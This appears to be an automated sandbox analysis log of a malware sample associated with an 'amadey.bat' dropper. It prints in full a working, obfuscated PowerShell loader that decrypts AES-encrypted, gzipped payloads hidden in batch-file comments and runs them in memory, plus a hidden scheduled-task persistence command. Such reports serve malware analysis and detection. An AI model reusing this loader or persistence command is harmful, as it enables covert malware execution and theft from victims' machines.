Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\local\temp\rarsfx0\amadey.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\local\temp\rarsfx0\amadey.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" register-scheduledtask -taskname 'runtimebroker_startup_958_str' -trigger (new-scheduledtasktrigger -atlogon) -action (new-scheduledtaskaction -execute 'c:\users\user\appdata\roaming\startup_str_958.vbs') -settings (new-scheduledtasksettingsset -allowstartifonbatteries -hidden -executiontimelimit 0) -runlevel highest -force
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\roaming\startup_str_958.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\roaming\startup_str_958.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[system.security.cryptography.aes]::create(); $aes_var.mode=[system.security.cryptography.ciphermode]::cbc; $aes_var.padding=[system.security.cryptography.paddingmode]::pkcs7; $aes_var.key=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('vgtuugykanih9yhzdnc5etwdm0+akh40igdijn6helq='); $aes_var.iv=[system.convert]::('gnirts46esabmorf'[-1..-16] -join '')('gq/przspw/sfj7e+xuuwra=='); $decryptor_var=$aes_var.createdecryptor(); $return_var=$decryptor_var.transformfinalblock($param_var, 0, $param_var.length); $decryptor_var.dispose(); $aes_var.dispose(); $return_var;}function decompress_function($param_var){ $vdega=new-object system.io.memorystream(,$param_var); $adrdx=new-object system.io.memorystream; $hvzlb=new-object system.io.compression.gzipstream($vdega, [io.compression.compressionmode]::decompress); $hvzlb.copyto($adrdx); $hvzlb.dispose(); $vdega.dispose(); $adrdx.dispose(); $adrdx.toarray();}function execute_function($param_var,$param2_var){ $hmqcz=[system.reflection.assembly]::('daol'[-1..-4] -join '')([byte[]]$param_var); $yswqp=$hmqcz.entrypoint; $yswqp.invoke($null, $param2_var);}$host.ui.rawui.windowtitle = 'c:\users\user\appdata\roaming\startup_str_958.bat';$hexfg=[system.io.file]::('txetlladaer'[-1..-11] -join '')('c:\users\user\appdata\roaming\startup_str_958.bat').split([environment]::newline);foreach ($xqpwb in $hexfg) { if ($xqpwb.startswith(':: ')) { $qgdil=$xqpwb.substring(3); break; }}$payloads_var=[string[]]$qgdil.split('\');$payload1_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([convert]::('gnirts46esabmorf'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A3BEFF SetEntriesInAclW,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateDirectoryW,LocalFree, 0_2_00A3BEFF
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A40826 cpuid 0_2_00A40826
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_00A3C093
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A3F05C GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle, 0_2_00A3F05C
Source: C:\Users\user\Desktop\jcgLYlM4dg.exe Code function: 0_2_00A2C365 GetVersionExW, 0_2_00A2C365
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 14.2.powershell.exe.a081288.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.powershell.exe.a081288.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000E.00000002.2234189987.000000000A080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2235318287.000000000A0F1000.00000020.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3354959740.000000000AAE1000.00000020.10000000.00040000.00000000.sdmp, type: MEMORY